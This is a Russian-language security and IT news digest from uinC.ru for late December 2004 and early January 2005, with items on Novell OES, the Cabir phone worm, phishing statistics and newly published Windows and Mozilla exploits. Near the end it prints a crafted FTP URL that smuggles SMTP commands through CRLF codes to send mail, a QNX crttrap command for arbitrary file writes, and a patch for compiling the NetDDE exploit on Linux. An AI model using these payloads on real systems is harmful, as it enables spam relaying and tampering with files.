Как сообщает Eweek, компания Novell представила первую публичную бета-версию Novell Open Enterprise Server. OES представляет собой двойную операционную систему. Она может работать на базе SuSE Linux Enterprise Server 9.0, NetWare 7.0 или на обоих. В настоящее время OES доступна только для архитектуры x86. Пользователю потребуется процессор с частотой не менее 700 МГц, 512 МБ RAM. OES появится в продаже в феврале 2005 года. Цена пока не называаетя.
CNews

30/12/2004 10:36 Apple готовит компьютер за 499 долларов?
По Сети начали гулять хорошо проверенные слухи о том, что компания Apple Computer решила обратить внимание на малообеспеченные слои американского народа. На ближайшей выставке MacWorld Expo компания представит компьютер за 499 долларов. Без монитора. Точной информации о планах Стива Джобса пока нет ни у кого, но журнал The Register, ссылающийся на сайт ThinkSecret.com, утверждает, что машина, выполненная в уже полузабытом форм-факторе slim-case (или, как ее называют там, у них, pizza box) высотой всего 44 миллиметра, а внутри пытливый глаз счастливого владельца сможет обнаружить процессор G4, работающий на частоте 1,25 гигагерц. Кроме того, в недрах машины с кодовым названием Q88, можно будет найти 256 мегабайт памяти, порты USB 2.0 и FireWire 400, Ethernet-карту на 10/100 мегабит в секунду, модем на 56 килобит и, что удивительно для такой дешевой системы, адаптер беспроводного доступа стандарта 802.11b/g. Машина, по всей видимости, будет продаваться под хорошо раскрученным брендом iMac и будет рассчитана, главным образом, на владельцев "полноразмерных" "маков" и Windows-системы, которым нужен компьютер для спальной комнаты.
Internet.Ru

30/12/2004 11:14 В Бауманке создают программу для мобильного ТВ
Смотреть телеканалы на экране мобильного телефона можно будет в Москве и других крупных городах России уже в будущем году. Об этом в эфире «Эха Москвы» заявил гендиректор Российской телерадиовещательной сети Геннадий Скляр. Он уточнил, что речь идет о разработке молодых программистов из МВТУ имени Баумана. Они уже подали заявку на патент. По словам Скляра, «такого нет нигде в мире». Новые частоты для просмотра телеканалов не понадобятся, услугу можно будет оформить у любого сотового оператора с подключенным GPRS. По словам Скляра, специальную программу можно будет установить на телефон, независимо от модели. Главное — поддержка мобильного интернета через GPRS.
"Вебпланета"

30/12/2004 12:16 Опубликован исходный код троянца для смартфонов, ожидается появление новых видов атак
Как утвержается на сайте TechWeb News, исходный код троянца Cabir, предназначенного для заражения смартфонов, опубликован на одном из хакерских сайтов. Это может позволить вирусописателям создать более опасные клоны этого троянца. Об этом говорит также появление более опасных разновидностей троянца - H и I. Как и первая версия Cabir, новые версии червя распространяются по мобильникам в виде специального файла, который распознается системой как утилита управления безопасностью. После того, как инфицированный файл был запущен, на экране появляется слово «Caribe» и червь модифицирует ОС для автозапуска себя при каждом включении телефона. Инфицированный телефон ищет другие уязвимые телефоны через Bluetooth-соединение, и после успешного поиска пересылает на них файл velasco.sis, содержащий червя. Хотя вирус и не уничтожает данные, хранящиеся в телефоне, он блокирует санкционированные bluetooth-соединения и потребляет большой ресурс аккумулятора из-за постоянно включенного Bluetooth-соединения. Обе новые версии вируса изменены таким образом, чтобы быстрее распространяться на новые устройства. Например, они могут находить телефон даже при его уходе из зоны досягаемости. В условиях постоянных телефонных коммуникаций вирус может распространяться очень быстро, сообщает представитель компании. Алексей Гостев, старший вирусный аналитик "Лаборатории Касперского" обвиняет в создании и распространении исходного кода трояна известную хакерскую группу из России "29А". Впрочем, "любовь" "Лаборатории" к этой группе известна давно. Тем не менее, согласно сообщениям другой антивирусной компании - Sophos из Великобритании, в распространении исходного кода виновата одна из бразильских хакерских команд, которая переделала исходный код троянца и опубликовала исходный код уже переработанной (и более опасной) версии Cabir.
TechWeb News

30/12/2004 12:18 NNTP для NetBSD закрывается
Киммо Суоминен (Kimmo Suominen) сообщил, что доступ к почтовым рассылкам NetBSD по NNTP после 10 лет работы будет прекращен. Связано это с тем, что просто больше нет возможности выделять дополнительные ресурсы при условии, что есть и другие хорошие публичные сервисы (в пример приводится gmane.org). Ожидается, что news.gw.com уйдет в offline в конце 31 декабря 2004 года.
Nixp.Ru

30/12/2004 12:22 Взломан сайт проекта Beep Media Player
Вереницу взломов последних дней (от сайта SCO до массовой атаки на phpBB2, из-за чего, в частности, пострадал "Линукс Центр" (www.linuxcenter.ru) и BSDMagazine.ru), продолжил официальный сайт проекта BMP (Beep Media Player — мультимедийного проигрывателя для UNIX/Linux-систем). Взломщик просто разметил оскорбительное сообщение в новостях на главной странице, пояснив, что сайт взломан, поблагодарив всех и пожелав спокойной ночи.
Nixp.Ru

30/12/2004 12:34 Фишинг - наиболее быстрорастущий вид компьютерной преступности
Почти все онлайновые банковские системы освоены мошенниками-фишерами, утверждают специалисты по информационной безопасности компании MessageLabs. В течение 11 месяцев текущего года эксперты MessageLabs обнаружили в Интернете более 18 млн. писем, отправленных фишерами. Из всего потока электронной почты 73% писем были спамом (год назад - 40%), а каждое 16-е содержало вирус. В своем годовом отчете аналитики MessageLabs назвали фишинг наиболее быстрорастущим видом компьютерной преступности. В сентябре 2003 г. эксперты компании отловили всего лишь 273 письма, направляющих пользователя на фальшивые веб-сайты, стилизованные под интернет-банки. К сентябрю 2004 г. поток отловленных писем фишеров составил уже более 2 млн в месяц. Фишеры используют все более сложные технологии для сбора банковских реквизитов. Ранее атаки фишеров, в основном, состояли в перенаправлении ничего не подозревающего пользователя на подставной банковский сайт; теперь информация о банковских реквизитах крадется при открытии электронного сообщения. Пользователю достаточно лишь открыть письмо на отвлеченную тему или вложение письма, использующие уязвимость в почтовых клиентах Microsoft. "Фишинг" может обойтись пользователям Сети в 500 миллионов долларов. Такой подсчет сделал Ponemon Institute (http://www.ponemon.org/), занимающийся вопросами privacy и гражданских свобод. В рамках исследования было опрошено 1335 американских интернет-пользователей. В результате опроса обнаружилось, что 76% респондентов знакомы с электронными письмами-обманками. 70% из этого числа заходили на сайт-обманку, ссылка на который располагалась в подложном письме, 15% оставляли на этом сайте свои персональные данные, а 2% признались в том, что понесли конкретные финансовые потери в результате фишинга. В апреле Gartner проводило аналогичное исследование. Согласно ему, 57 милионов американцев получали письмо от фишеров. Из них 1,8 миллиона человек (3%) оставили личную информацию о себе. Финансовые потери от этой деятельности составили 1,2 миллиона долларов, сообщает InformationWeek.
Crime-Research.ru

30/12/2004 12:57 2004 год - год сетевого криминала
Уходящий год был особенно плодороден на угрозы персональным компьютерам. Количество известных на сегодня вирусов перевалило за 100 тысяч, а объем новоиспеченных "червей" в 2004 году превысил 50%. Изощренные попытки заставить людей раскрыть конфиденциальную информацию увеличилось на рекордные 30%. В 2004 году куда меньше стало подростков, пытающихся прославиться, написав какой-нибудь особенно вредный вирус. Так считает Кевин Хоган, главный менеджер компании Symantec. По мнению Хогана, основной акцент в уходящем году был сделан на использование нелегальных компьютерных программ в преступных целях. К мнению Хогана присоединяется и Грэм Клюли, главный консультант компании Sophos, разрабатывающей антивирусные программы. "Когда в дело подключается коммерция, ситуация становится действительно неприятной. Авторы вирусов и хакеры будут пытаться теперь заработать значительные суммы", - говори Клюли. Обзор уяходящего года от BBC (на основании информации, предоставленной Sophos) можно посмотреть, посетив приведённую ниже ссылку.
Итоги уходящего года от BBC

30/12/2004 13:14 Рейтинг лучших RSS читалок
На сайте Нонеймыча опубликован обзор RSS-читалок, подготовленный господином Дмитрием. Думается, любителем RSS-лент будет интересно почитать его, хотя, как пишет сам автор, обзор является его IMHO ("ОЧЕНЬ СУБЪЕКТИВНЫЙ"). В результате возникшей дискуссии (вернее, сообщений, полученных по E-mail), автор вынужден был опубликовать необходимые пояснения по рейтингу.
Страница с рейтингом
Пояснения автора рейтинга

31/12/2004 00:00 С НОВЫМ, 2005-М, ГОДОМ!
Команда UINC поздравляет всех посетителей нашего сайта с Новым Годом! Желаем всем нашим коллегам и единомышленникам счастья в наступающем году и дальнейшего повышения профессионального мастерства! Со своей же стороны мы постараемся приложить максимум сил и возможностей, чтобы в наступающем году наш сайт стал ещё лучше и качественнее. Удачи вам всем!

2/01/2005 11:17 Опубликован эксплоит Microsoft WINS Remote Code Execution
На сайте французской группы K-Otik был выложен исходник вышеозначенного эксплоита. В комментарии указывается, что данный эксплоит работает на всех W2k sp3/sp4.
Исходник

2/01/2005 12:56 Уязвимость в Mozilla
Maurycy Prodeus из польской команды iSEC Security Research сообщает об уязвимости в популярном браузере Mozilla. Как сообщает автор, уязвимость связана с некорректной обработкой ссылок формата NNTP (news://) в исходном коде файла nsNNTPProtocol.cpp. В результате можно софрмировать определённый URL, при обработке которого может возникнуть переполнение кучи, что позволит удалённому серверу выполнить произвольный код в системе клиента. Как пишет Maurycy, в версии 1.7.5 уязвимость устранена, однако присутствует в версиях до 1.7.3. Автором выпущен пример кода эксплоита.
Описание уязвимости

2/01/2005 14:08 Эксплоит уязвимости в Windows
Опубликован исходный код эксплоита уязвимости, обнаруженной в семействе ОС Windows в службе NetDDE и описанной в вышедшем бюллетене MS04-031. Код написан как для компиляции в win32, так и для Linux. Небольшое замечание - для компиляции в Linux Alberto Garcнa Hierro рекомендует добавить следующие 2 строки - выход после diff:
@@ -11,6 +11,9 @@
#include
#include
#include
+#include
+#define Sleep(x) sleep(x)
+#define closesocket(x) close(x)
#endif
Второй собеседник Steve Friedl, однако, рекомендует другой вариант использования функции sleep (ввиду их разной реализации в Windows и Linux) - define Sleep(x) sleep(((x)+500)/1000). Как пишет автор эксплоита, houseofdabus, работа эксплоита проверена в следующих ОС: Windows XP Professional SP0, Windows XP Professional SP1, Windows 2000 Professional SP2, Windows 2000 Professional SP3, Windows 2000 Professional SP4, Windows 2000 Advanced Server SP4.
Исходный код и описание

2/01/2005 15:29 Уязвимость в QNX
Обнаружена уязвимость в QNX crttrap. Локальный атакующий может читать и записывать произвольные файлы на системе. Локальный пользователь может запустить crttrap с параметром '-c' и тегом 'trap' и записать файл в произвольную директорию. Пример: $ crttrap -c tmp/rfdslabs trap. Патча на данный момент не существует.
Описание

2/01/2005 16:41 Возможность рассылки спама с использованием браузера
Как сообщается на форуме Forum.Protocols.ru, по сообщению Beyond Security браузеры Internet Explorer v6 SP1 и Konqueror v3.2, поддерживающие функции FTP-клиента, могут использоваться злоумышленниками для рассылки спама при посещении пользователями сайтов со специально сформированными URL. Браузер Mozilla Firefox v1.0 такой уязвимости не имеет. Уязвимые браузеры принимают в URL коды %0a и %0d (CRLF). В URL для FTP эти коды служат для указания имени пользователя и пароля. Благодаря некоторому сходству в работе протоколов FTP и SMTP, данная особенность браузеров может использоваться для отправки сообщений по электронной почте. Приведенная ниже ссылка - http://dsbl.org/testingground/IE-FTP-SMTP-link/ показывает пример использования этой особенности браузеров. Если после перехода по этой ссылке, вы посмотрите код страницы, то увидите строку URL
Код:
ftp://foo%0d%0aHELO%20mail%0d%0a
MAIL%20FROM%3a<>%0d%0a
RCPT%20TO%3a<ian-example%40penguinhosting.net>%0d%0a
DATA%0d%0a
Subject%3a%20hacked%0d%0a
To%3a%20ian%40penguinhosting.net%0d%0a%0d%0a
hacked%0d%0a.%0d%0a:bar@mx.penguinhosting.net:25/
которая позволяет отправить сообщение по электронной почте.
Источник


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru